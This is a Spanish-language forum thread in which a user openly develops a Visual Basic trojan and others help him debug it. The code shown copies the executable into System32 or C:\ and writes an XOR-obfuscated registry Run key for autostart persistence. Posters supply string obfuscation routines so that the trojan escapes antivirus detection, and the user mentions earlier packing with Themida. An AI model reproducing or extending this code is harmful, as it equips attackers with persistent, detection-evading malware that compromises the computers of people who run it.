copiar a system o system 32

Iniciado por vivachapas, 1 Mayo 2007, 20:15 PM

0 Miembros y 1 Visitante están viendo este tema.

Hendrix

Mira, te paso una fucnion mucho mas simple que eso, aki tienes:

Public Function crypt(j)
On Error Resume Next
For R = 1 To Len(j)
crypt = crypt & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function


Esta funcion cifra y descifra a la vez, ya que usa Xor.

Un Saludo.  ;)
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

~~

Para obtener la ruta de windows y de system32, mejor q andar usando la api es usar environ, por ej:

msgbox environ("WINDIR")
msgbox environ ("SYSTEMDIR")


La de system32 creo q era asi, q no me apetece provar  :xD :xD

Hay mas llamadas como HOMEDRIVE para el disco C (comunmente claro ;)) o TMP para los temporales, tb hay otra para archivos de programa pero no me acuerdo ahora..

1S4ludo

Hendrix

Para la carpeta System32 no hay ninguna (que yo sepa), la otra que te da la carpeta de windows es %Systemroot%.

Temporales --> tmp
Archivos de programa --> Programfiles

Si quieres ver todas esas variables, ve a la consola, escribe set y pulsa enter....

Un Saludo.  ;)

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

~~

Da igual una q otra mira:

Private Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub

Hendrix

Ya lo se, tu habia puesto systemdir, que es incorrecto... ;) ;)

Un Saludo.
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

vivachapas

bien! al fin me anda el foro1 jeje hace horas q trato reponder...

CitarPrivate Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub

gracias EON por ese code... seguro lo uso en otro troyano para ahorrarme un modulo...


y hendrix.. en seguida pruebo esa funcion ;)
pero me podrias decir q hice mal en la q invente... ademas de q es complicada... me mata no poder hacer algo bien XD

Hendrix

Te e arreglado la tuya:

Dim Des As String

Public Function descifrar(Ruta As String) As String
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
descifrar = Ruta
End Function

Private Sub Command1_Click()
Des = descifrar("####$$&&***%/***")
MsgBox Des
End Sub


Eran errores muy basicos, conviene que te leas mas sobre VB antes de empezar a hacer segun que proyectos... :-\ :-\

Un Saludo.

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

vivachapas

gracias! me funciono re bien... perdon xq tarde en responder pero no me entraba el foro...

probe el server y lo sigue detectando... :( dice q intenta crear un archivo *.exe
creo q debe ser cuando se copia a system32
se puede cifrar esto?? como??

le dejo el code:

FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\klass.exe"
Ruta = System32 & "\klass.exe"


el modulo es el q postie al principio



perodonen por tantas preguntas es q es la primera vez q hago esta parte de ltroyano... simpre hacia uno le pasaba el themida y solamente funcionaba hasta q apagaban la compu o lo borraban XD

vivachapas

#28
PROBLEMA SOLUCIONADO EL DE ABAJO! DESPUES DE MODIFICARLO MILES DE VECES ME DI CUENTA Q ME FALTABAN DOS " XD

no me anda :@ no se xq ya probe miles de formas y codigos... porfavor diganme q hago mal... :S


Dim Clave As Object
Dim WINDOWS As String

Private Sub Form_Load()
WINDOWS = Environ(windir)
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\jeje.exe"
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%mbmb%+'%D=[mbmb)bb")
End Sub

Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function


eso se copia y se graba en el registro... pero cuando compilo el programa dice:

Error '5' en tiempo de ejecucion:
Llamada a procedimiento o argumentos no válidos


q es?? no entiendo... el codigo creo q esta bien... hice lo q Hendrix me dijo  :huh:


bueno modifique el codigo cientos de veces... probe con nuevos proyectos... de todo... y creo q el error esta aca... pero no se como solucionarlo

Dim WINDOWS As String

WINDOWS = Environ(windir)

vivachapas

ahora me da error '450'
numero de argumentos erroneos o asignacion de propiedad no valida


esto me pone de mal humor.... :S


Dim WINDOWS As String
Dim Clave As Object

Private Sub Form_Load()
WINDOWS = Environ("windir")
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%wurbef%+'%D=[mbmb)bb")
End Sub

Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function


veran q todos los code son distintos ya q voy probando cambiando... haciendo nuevos proyectos -.-
bueno espero q alguien detecte el error por favor... esto ya me estallevando muchisimo tiempo